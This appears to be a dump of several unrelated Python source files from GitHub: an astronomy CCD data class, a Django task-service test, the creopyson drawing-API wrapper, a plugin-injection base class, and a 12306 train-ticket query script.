function allow to free the memory by unloading unused CCDs\n def unload(self,all=False):\n self.data = None\n self.sky_background = None\n if all:\n self.background_median = None\n self.background_average = None\n self.background_std = None\n self.background_proportion = None\n\n # Export in a dictionnary to be stored in a human-readable format\n def to_dict(self):\n dict = {'id':self.id,\n 'background_average' :self.background_average,\n 'background_median' :self.background_median,\n 'background_std' :self.background_std,\n 'background_proportion':self.background_proportion,\n 'fwhm' :self.fwhm,\n 'apcor_inner_radius' :self.apcor_inner_radius,\n 'apcor_outer_radius' :self.apcor_outer_radius,\n 'apcor_factor' :self.apcor_factor,\n 'apcor_uncertainty' :self.apcor_uncertainty,\n 'zeropoint' :self.zeropoint,\n 'trans_a' :self.trans_mat[0] if self.trans_mat is not None else None,\n 'trans_b' :self.trans_mat[1] if self.trans_mat is not None else None,\n 'trans_c' :self.trans_mat[2] if self.trans_mat is not None else None,\n 'trans_d' :self.trans_mat[3] if self.trans_mat is not None else None,\n 'trans_e' :self.trans_mat[4] if self.trans_mat is not None else None,\n 'trans_f' :self.trans_mat[5] if self.trans_mat is not None else None\n }\n return dict\n\n # Export in numpy array that can be used to train an ai (need to be normalized before)\n def to_ai_ready(self, **kwargs):\n return array( [ self.background_median,\n self.background_average,\n self.background_std,\n self.background_proportion,\n self.fwhm,\n self.apcor_inner_radius,\n self.apcor_outer_radius,\n self.apcor_factor,\n self.apcor_uncertainty,\n self.zeropoint\n ] + list(self.trans_mat))","repo_name":"Leirof/M1-TNO_Detection_Efficiency","sub_path":"classes/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":6769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18808827388","text":"from django.test import TestCase\nfrom productivity.services.TaskService import TaskService\nfrom productivity.services.ProjectService import ProjectService\nimport unittest\n\nclass TestTaskService(TestCase):\n\n @unittest.skip(\"Bug in todoist api\")\n def test_CRUD_task(self) -> None:\n project = ProjectService.createProject(\n \"test task project\"\n )\n content = \"test CRUS TaskService\"\n desc = \"test CRUD desc\"\n priority = 2\n task = TaskService.createTask(\n content = content,\n description = desc,\n project=project,\n priority=priority\n )\n task = TaskService.getTask(task.id)\n self.assertEqual(task.content, content)\n self.assertEqual(task.project, project)\n self.assertEqual(task.description, desc)\n self.assertEqual(task.priority, priority)\n\n new_content = \"test CRUD updated\"\n new_priority = 4\n new_project = ProjectService.createProject(\n \"test new CRDU project\"\n )\n task.content = new_content\n task.priority = new_priority\n task.project = new_project\n TaskService.updateTask(task)\n task = TaskService.getTask(task.id)\n self.assertEqual(task.content, content)\n self.assertEqual(task.project, project)\n self.assertEqual(task.description, desc)\n self.assertEqual(task.priority, priority)\n\n TaskService.deleteTask(task)\n self.assertFalse(\n task.id in [task.id for task in TaskService.get_tasks()]\n )\n\n def test_get_mark_complate(self) -> None:\n pass\n\n def test_todoist_persistance(self) -> None:\n pass\n","repo_name":"NathanRoseCE/RoseCore_Server","sub_path":"rosecore/productivity/tests/TestTaskService.py","file_name":"TestTaskService.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73872806766","text":"\"\"\"Drawing module.\"\"\"\n\n\ndef add_model(client, model, drawing=None):\n \"\"\"Add a model to a drawing.\n\n Args:\n client (obj):\n creopyson Client.\n model (str):\n Model name.\n drawing (str, optional):\n Drawing name. Defaults is Current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model\": model}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"add_model\", data)\n\n\ndef add_sheet(client, position=None, drawing=None):\n \"\"\"Add a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n position (int, optional):\n Position to add the sheet.\n Defaults: Sheet will be added to the end.\n drawing (str, optional):\n Drawing name. Defaults is current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if position is not None:\n data[\"position\"] = position\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"add_sheet\", data)\n\n\ndef create(\n client,\n template,\n model=None,\n drawing=None,\n scale=None,\n display=None,\n activate=None,\n new_window=None,\n):\n \"\"\"Create a new drawing from a template.\n\n Args:\n client (obj):\n creopyson Client.\n template (str):\n Template\n model (str, optional):\n Model name. Defaults: Current active model.\n drawing (str, optional):\n New drawing name.\n Defaults: A name derived from the model's instance name.\n scale (float, optional):\n Drawing scale. Defaults is `1.0`.\n display (boolean, optional):\n Display the drawing after open. Defaults is False.\n activate (boolean, optional):\n Activate the drawing window after open. Defaults is False.\n new_window (boolean, optional):\n Open drawing in a new window. Defaults is False.\n\n Returns:\n (str): New drawing name.\n\n \"\"\"\n data = {\"template\": template}\n if model is not None:\n data[\"model\"] = model\n if drawing is not None:\n data[\"drawing\"] = drawing\n if scale is not None:\n data[\"scale\"] = scale\n if display is not None:\n data[\"display\"] = display\n if activate is not None:\n data[\"activate\"] = activate\n if new_window is not None:\n data[\"new_window\"] = new_window\n return client._creoson_post(\"drawing\", \"create\", data, \"drawing\")\n\n\ndef create_gen_view(\n client,\n model_view,\n point,\n drawing=None,\n view=None,\n sheet=None,\n model=None,\n scale=None,\n display_data=None,\n exploded=None,\n):\n \"\"\"Create general view on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model_view (str):\n Model view to use for the drawing view orientation.\n point (dict):\n Coordinates for the view in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n view (str, optional):\n New view name. Defaults: the model_view parameter.\n sheet (int, optional):\n Sheet number. Defaults: current active sheet on the drawing.\n model (str, optional):\n Model for the view. Defaults: current active model on the drawing.\n scale (float, optional):\n View scale. Defaults: the sheet's scale.\n display_data (dict, optional):\n Display parameters used to create the view.\n Defaults: Creo defaults.\n exploded (boolean, optional):\n Whether to create the view as an exploded view. 
Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model_view\": model_view, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n if sheet is not None:\n data[\"sheet\"] = sheet\n if model is not None:\n data[\"model\"] = model\n if scale is not None:\n data[\"scale\"] = scale\n if display_data is not None:\n data[\"display_data\"] = display_data\n if exploded is not None:\n data[\"exploded\"] = exploded\n return client._creoson_post(\"drawing\", \"create_gen_view\", data)\n # TODO: JLpoint Method for point\n # TODO: ViewDisplayData method for display_data\n\n\ndef create_proj_view(\n client,\n parent_view,\n point,\n drawing=None,\n view=None,\n sheet=None,\n display_data=None,\n exploded=None,\n):\n \"\"\"Create projection view on a drawing.\n\n When specifying the view coordinates, you should specify only an X or a Y\n coordinate to avoid confusion. If you specify both coordinates, it\n appears Creo may be using whichever has the larger absolute value.\n\n Args:\n client (obj):\n creopyson Client\n parent_view (str):\n Parent view for the projection view.\n point (dict):\n Coordinates for the view, relative to the location\n of the parent view, in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n view (str, optional):\n New view name. Defaults: Creo's default name for a new view.\n sheet (int, optional):\n Sheet number. Defaults: current active sheet on the drawing.\n display_data (dict, optional):\n Display parameters used to create the view.\n Defaults: the display parameters of the parent view.\n exploded (boolean, optional):\n Whether to create the view as an exploded view. Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"parent_view\": parent_view, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n if sheet is not None:\n data[\"sheet\"] = sheet\n if display_data is not None:\n data[\"display_data\"] = display_data\n if exploded is not None:\n data[\"exploded\"] = exploded\n return client._creoson_post(\"drawing\", \"create_proj_view\", data)\n\n\ndef create_symbol(\n client, symbol_file, point, drawing=None, replace_values=None, sheet=None\n):\n \"\"\"Add a symbol instance to a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n point (dict):\n Coordinates for the symbol in Drawing Units.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n replace_values (dict, optional):\n Object containing replacement values for any\n variable text in the symbol. Defaults to None.\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: the symbol will be added to all sheets.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_file\": symbol_file, \"point\": point}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if replace_values is not None:\n data[\"replace_values\"] = replace_values\n if sheet is not None:\n data[\"sheet\"] = sheet\n return client._creoson_post(\"drawing\", \"create_symbol\", data)\n\n\ndef delete_models(client, model=None, drawing=None, delete_views=None):\n \"\"\"Delete one or more models from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str, optional):\n Model name (wildcard allowed: True).\n Defaults: all models will be deleted from the drawing.\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n delete_views (boolean, optional):\n Whether to delete drawing views associated with the model.\n Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n if delete_views is not None:\n data[\"delete_views\"] = delete_views\n return client._creoson_post(\"drawing\", \"delete_models\", data)\n\n\ndef delete_sheet(client, sheet, drawing=None):\n \"\"\"Delete a drawing sheet.\n\n An error will occur if you try to delete the only sheet in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_sheet\", data)\n\n\ndef delete_symbol_def(client, symbol_file, drawing=None):\n \"\"\"Delete a symbol definition and its instances from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_symbol_def\", data)\n\n\ndef delete_symbol_inst(client, symbol_id, drawing=None):\n \"\"\"Delete a specific symbol instance from a drawing.\n\n Args:\n client (obj):\n creopyson Client\n symbol_id (str):\n ID of the symbol instance.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"symbol_id\": symbol_id}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"delete_symbol_inst\", data)\n\n\ndef delete_view(client, view, drawing=None, sheet=None, del_children=None):\n \"\"\"Delete a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n sheet (int, optional):\n Sheet number; if filled in, the view will only be deleted if it is\n on that sheet. Defaults: Delete the view from any sheet.\n del_children ([boolean, optional):\n Whether to also delete any children of the view. Defaults is False.\n\n Returns:\n None\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if sheet is not None:\n data[\"sheet\"] = sheet\n if del_children is not None:\n data[\"del_children\"] = del_children\n return client._creoson_post(\"drawing\", \"delete_view\", data)\n\n\ndef get_cur_model(client, drawing=None):\n \"\"\"Get the active model on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (str): Model name.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_cur_model\", data, \"file\")\n\n\ndef get_cur_sheet(client, drawing=None):\n \"\"\"Get the current drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n\n Returns:\n (int): Sheet number.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_cur_sheet\", data, \"sheet\")\n\n\ndef get_num_sheets(client, drawing=None):\n \"\"\"Get the number of sheets on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (int): Number of sheets.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_num_sheets\", data, \"num_sheets\")\n\n\ndef get_sheet_format(client, sheet, drawing=None):\n \"\"\"Get the drawing format file of drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict):\n file(str):\n Format file name, may be null if there is no current format.\n full_name(str):\n Format full name.\n common_name(str):\n Format common name.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_sheet_format\", data)\n\n\ndef get_sheet_scale(client, sheet, drawing=None, model=None):\n \"\"\"Get the scale of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n model (str, optional):\n Drawing model used to calculate the scale.\n Defaults: the active model on the drawing.\n\n Returns:\n (float): Sheet scale.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"get_sheet_scale\", data, \"scale\")\n\n\ndef get_sheet_size(client, sheet, drawing=None):\n \"\"\"Get the size of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (str): Sheet size.\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_sheet_size\", data, \"size\")\n\n\ndef get_view_loc(client, view, drawing=None):\n \"\"\"Get the location of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict):\n x (float): X-coordinate of the view\n y (float): Y-coordinate of the view\n z (float): Z-coordinate of the view\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_loc\", data)\n # TODO: return a tuple (x,y,z)?\n\n\ndef get_view_scale(client, view, drawing=None):\n \"\"\"Get the scale of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n\n Raises:\n Warning: error message from creoson.\n\n Returns:\n (float): View scale.\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_scale\", data, \"scale\")\n\n\ndef get_view_sheet(client, view, drawing=None):\n \"\"\"Get the sheet number that contains a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (int): Sheet number.\n\n \"\"\"\n data = {\"view\": view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"get_view_sheet\", data, \"sheet\")\n\n\ndef is_symbol_def_loaded(client, symbol_file, drawing=None):\n \"\"\"Check whether a symbol definition file is loaded into Creo.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (boolean): Whether the symbol definition is loaded into Creo.\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"is_symbol_def_loaded\", data, \"loaded\")\n\n\ndef list_models(client, model=None, drawing=None):\n \"\"\"List the models contained in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str, optional):\n Model name filter (wildcards allowed: True).\n Defaults: no filter.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (list:str): List of model names in the drawing.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"list_models\", data, \"files\")\n\n\ndef list_symbols(client, drawing=None, symbol_file=None, sheet=None):\n \"\"\"List symbols contained on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n symbol_file (str, optional):\n Symbol file name filter. Defaults: no filter.\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: The symbol will be added to all sheets.\n\n Returns:\n (list:dict):\n List of symbols in the drawing.\n id (int): Symbol ID.\n symbol_name (str): Symbol name.\n sheet (int): Sheet number.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if symbol_file is not None:\n data[\"symbol_file\"] = symbol_file\n if sheet is not None:\n data[\"sheet\"] = sheet\n return client._creoson_post(\"drawing\", \"list_symbols\", data, \"symbols\")\n\n\ndef list_view_details(client, view=None, drawing=None):\n \"\"\"List the views contained in a drawing, with more details.\n\n Args:\n client (obj):\n creopyson Client\n view (str, optional):\n View name filter (wildcards allowed: True). Defaults: no filter.\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n\n Returns:\n (list:dict):\n List of views in the drawing\n name (str):\n View name.\n sheet (int):\n Sheet number.\n location (dict):\n Coordonates\n x (float): X-coordinate of the view\n y (float): Y-coordinate of the view\n z (float): Z-coordinate of the view\n text_height (float):\n Text Heigh in Drawing Units.\n view_model (str):\n View model name.\n simp_rep (str):\n View simplified rep name.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"list_view_details\", data, \"views\")\n\n\ndef list_views(client, view=None, drawing=None):\n \"\"\"List the views contained in a drawing.\n\n Args:\n client (obj):\n creopyson Client\n view (str, optional):\n View name filter (wildcards allowed: True). Defaults: no filter.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (list:str): List of views in the drawing.\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"list_views\", data, \"views\")\n\n\ndef load_symbol_def(client, symbol_file, symbol_dir=None, drawing=None):\n \"\"\"Load a Creo symbol definition file into Creo from disk.\n\n Args:\n client (obj):\n creopyson Client\n symbol_file (str):\n Name of the symbol file.\n symbol_dir (str, optional):\n Directory containing the symbol file; if relative,\n assumed to be relative to Creo's current working directory.\n Defaults: Creo's current working directory.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict): Symbol definition.\n id (int): ID of the loaded symbol.\n name (str): Symbol Name of the loaded symbol.\n\n \"\"\"\n data = {\"symbol_file\": symbol_file}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if symbol_dir is not None:\n data[\"symbol_dir\"] = symbol_dir\n return client._creoson_post(\"drawing\", \"load_symbol_def\", data)\n\n\ndef regenerate(client, drawing=None):\n \"\"\"Regenerate a drawing.\n\n Args:\n client (obj):\n creopyson Client\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"regenerate\", data)\n\n\ndef regenerate_sheet(client, sheet=None, drawing=None):\n \"\"\"Regenerate a sheet on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int, optional):\n Sheet number (0 for all sheets).\n Defaults: all sheets will be regenerated.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {}\n if sheet is not None:\n data[\"sheet\"] = sheet\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"regenerate_sheet\", data)\n\n\ndef rename_view(client, view, new_view, drawing=None):\n \"\"\"Rename a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n Old view name.\n new_view (str):\n New view name.\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"view\": view, \"new_view\": new_view}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"rename_view\", data)\n\n\ndef scale_sheet(client, sheet, scale, drawing=None, model=None):\n \"\"\"Set the scale of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n scale (float):\n View scale.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n model (str, optional):\n Drawing model to scale. Defaults: tThe active model on the drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet, \"scale\": scale}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if model is not None:\n data[\"model\"] = model\n return client._creoson_post(\"drawing\", \"scale_sheet\", data)\n\n\ndef scale_view(client, scale, view=None, drawing=None):\n \"\"\"Set the scale of one or more drawing views.\n\n Args:\n client (obj):\n creopyson Client\n scale (float):\n View scale.\n view (str, optional):\n View name (wildcards allowed: True).\n Defaults: all views will be scaled.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n (dict)\n succes_views (list):\n List of view which were successfully scaled.\n failed_views (list):\n List of view which failed to scale.\n\n \"\"\"\n data = {\"scale\": scale}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if view is not None:\n data[\"view\"] = view\n return client._creoson_post(\"drawing\", \"scale_view\", data)\n\n\ndef select_sheet(client, sheet, drawing=None):\n \"\"\"Make a drawing sheet the current sheet.\n\n Args:\n client (obj):\n creopyson Client\n sheet (int):\n Sheet number.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"sheet\": sheet}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"select_sheet\", data)\n\n\ndef set_cur_model(client, model, drawing=None):\n \"\"\"Set the active model on a drawing.\n\n Args:\n client (obj):\n creopyson Client\n model (str):\n Model name.\n drawing (str, optional):\n Drawing name. Defaults: current active drawing.\n\n Returns:\n None\n\n \"\"\"\n data = {\"model\": model}\n if drawing is not None:\n data[\"drawing\"] = drawing\n return client._creoson_post(\"drawing\", \"set_cur_model\", data)\n\n\ndef set_sheet_format(client, sheet, file_format, dirname=None, drawing=None):\n \"\"\"Set the drawing format file of a drawing sheet.\n\n Args:\n client (obj):\n creopyson Client.\n sheet (int):\n Sheet number.\n file_format (str):\n Format file name.\n dirname (str, optional): Directory name containing the file format.\n Defaults to None is current working directory.\n drawing (str, optional):\n Drawing name. Defaults to None is current active drawing.\n\n Returns:\n None\n \"\"\"\n data = {\"sheet\": sheet, \"dirname\": dirname}\n if drawing is not None:\n data[\"drawing\"] = drawing\n if file_format is not None:\n data[\"file\"] = file_format\n return client._creoson_post(\"drawing\", \"set_sheet_format\", data)\n\n\ndef set_view_loc(client, view, point, drawing=None):\n \"\"\"Set the location of a drawing view.\n\n Args:\n client (obj):\n creopyson Client\n view (str):\n View name.\n point (dict):\n Coordinates for the view in Drawing Units\n drawing (str, optional):\n Drawing name. 
Defaults: current active drawing.\n\n    Returns:\n        None\n\n    \"\"\"\n    data = {\"view\": view, \"point\": point}\n    if drawing is not None:\n        data[\"drawing\"] = drawing\n    return client._creoson_post(\"drawing\", \"set_view_loc\", data)\n\n\ndef view_bound_box(client, view, drawing=None):\n    \"\"\"Get the 2D bounding box for a drawing view.\n\n    Args:\n        client (obj):\n            creopyson Client\n        view (str):\n            View name.\n        drawing (str, optional):\n            Drawing name. Defaults: current active drawing.\n\n    Returns:\n        (dict):\n            xmin (float): Minimum X-coordinate of drawing view.\n            xmax (float): Maximum X-coordinate of drawing view.\n            ymin (float): Minimum Y-coordinate of drawing view.\n            ymax (float): Maximum Y-coordinate of drawing view.\n\n    \"\"\"\n    data = {\"view\": view}\n    if drawing is not None:\n        data[\"drawing\"] = drawing\n    return client._creoson_post(\"drawing\", \"view_bound_box\", data)\n","repo_name":"Zepmanbc/creopyson","sub_path":"creopyson/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":27224,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"2"}
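A minimal usage sketch for the drawing helpers above. It assumes a CREOSON server is already running and a drawing is open in Creo; the host, port, and coordinates are illustrative assumptions, not values from the source, and the `drawing_*` method bindings on the Client follow creopyson's usual module-prefix convention.

import creopyson

# Host/port are assumptions for a locally running CREOSON server.
client = creopyson.Client(ip_adress="localhost", port=9056)
client.connect()

# List views of the active drawing, move the first one, then read back
# its 2D bounding box (coordinates are in drawing units).
views = client.drawing_list_views()
client.drawing_set_view_loc(views[0], {"x": 100.0, "y": 50.0, "z": 0.0})
print(client.drawing_view_bound_box(views[0]))

client.disconnect()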
+{"seq_id":"20938920114","text":"import inspect\r\n\r\nfrom parm.api.cursor import Cursor\r\nfrom parm.extensions.extension_registry import ExtensionRegistry\r\nfrom parm.api.execution_context import ExecutionContext\r\nfrom parm.extensions.injection_context import InjectionContext\r\n\r\n\r\nclass ExtensionBase:\r\n def __init__(self, extension_registry: ExtensionRegistry):\r\n self.extension_registry = extension_registry\r\n\r\n def load_extension(self, ext_type):\r\n self.extension_registry.load_extension(ext_type)\r\n\r\n\r\ndef injected_func(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.injected_name = fn\r\n func.injected = True\r\n func.magic_getter = True\r\n return func\r\n return decorator\r\n\r\n fn.injected = True\r\n return fn\r\n\r\n\r\ndef magic_getter(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.getter_name = fn\r\n func.injected = True\r\n func.magic_getter = True\r\n return func\r\n return decorator\r\n\r\n assert callable(fn)\r\n fn.injected = True\r\n fn.magic_getter = True\r\n return fn\r\n\r\n\r\ndef magic_setter(fn):\r\n if isinstance(fn, str):\r\n def decorator(func):\r\n func.setter_name = fn\r\n func.injected = True\r\n func.magic_setter = True\r\n return func\r\n return decorator\r\n\r\n fn.injected = True\r\n fn.magic_setter = True\r\n return fn\r\n\r\n\r\nclass ExecutionExtensionBase(ExtensionBase):\r\n def __init__(\r\n self,\r\n extension_registry: ExtensionRegistry,\r\n execution_context: ExecutionContext,\r\n injection_context: InjectionContext):\r\n\r\n super().__init__(extension_registry)\r\n self.execution_context = execution_context\r\n self.injection_context = injection_context\r\n\r\n self.load_injections()\r\n\r\n def get_methods(self):\r\n return inspect.getmembers(self, predicate=inspect.ismethod)\r\n\r\n def load_injections(self):\r\n for name, method in self.get_methods():\r\n if getattr(method, 'injected', False):\r\n if getattr(method, 'magic_getter', False):\r\n name = getattr(method, 'getter_name', name)\r\n self.injection_context.inject_magic_getter(name, method)\r\n elif getattr(method, 'magic_setter', False):\r\n name = getattr(method, 'setter_name', name)\r\n self.injection_context.inject_magic_setter(name, method)\r\n else:\r\n name = getattr(method, 'injected_name', name)\r\n self.injection_context.inject_global(name, method)\r\n\r\n @property\r\n def cursor(self) -> Cursor:\r\n return self.execution_context.cursor\r\n\r\n @cursor.setter\r\n def cursor(self, value: Cursor):\r\n assert isinstance(value, Cursor)\r\n self.execution_context.cursor = value\r\n\r\n @property\r\n def match_result(self):\r\n return self.execution_context.match_result\r\n\r\n @property\r\n def program(self):\r\n return self.execution_context.program\r\n\r\n def create_pattern(self, pattern):\r\n if isinstance(pattern, str):\r\n pattern = self.program.create_pattern(pattern)\r\n return pattern\r\n","repo_name":"chananele/parm","sub_path":"parm/extensions/extension_base.py","file_name":"extension_base.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"2711063170","text":"#coding=utf-8\r\n\r\nimport requests\r\nimport json\r\nimport warnings\r\nimport time\r\n\r\ndef getLineList(src, dest):\r\n query_url='https://kyfw.12306.cn/otn/leftTicket/query'\r\n train_date='2017-06-29'\r\n from_station=src\r\n to_station=dest\r\n purpose_codes='ADULT'\r\n r=requests.get(query_url, params={'leftTicketDTO.train_date': train_date, 'leftTicketDTO.from_station': from_station, 'leftTicketDTO.to_station': to_station, 'purpose_codes': purpose_codes}, verify=False)\r\n obj=json.loads(r.text)\r\n lst=obj['data']['result']\r\n return lst\r\n\r\ndef getLine(src, dest):\r\n result=[[],[]]\r\n lst=getLineList(src, dest)\r\n for each in lst:\r\n tmp=each.split('|')\r\n s=tmp[3]+' '+src+' '+dest+' '+tmp[8]+' '+tmp[9]+' '+tmp[10]+' '\r\n price_url='https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice'\r\n train_no=tmp[2]\r\n from_station_no=tmp[16]\r\n to_station_no=tmp[17]\r\n seat_types=tmp[35]\r\n train_date='2017-06-29'\r\n\r\n try:\r\n for i in range(6):\r\n if i>=5:\r\n raise IOError\r\n r=requests.get(price_url, params={'train_no': train_no, 'from_station_no': from_station_no, 'to_station_no': to_station_no, 'seat_types': seat_types, 'train_date': train_date}, verify=False)\r\n if(r.text.find('validateMessagesShowId')>=0):\r\n break\r\n time.sleep(3)\r\n\r\n obj=json.loads(r.text)\r\n if 'WZ' in obj['data']:\r\n s=s+obj['data']['WZ'][1:]\r\n elif 'O' in obj['data']:\r\n s=s+obj['data']['O'][1:]\r\n else:\r\n raise IOError\r\n result[0].append(s)\r\n\r\n except:\r\n s=s+'0.0'\r\n result[1].append(s)\r\n\r\n finally:\r\n print(s)\r\n\r\n time.sleep(2)\r\n\r\n return 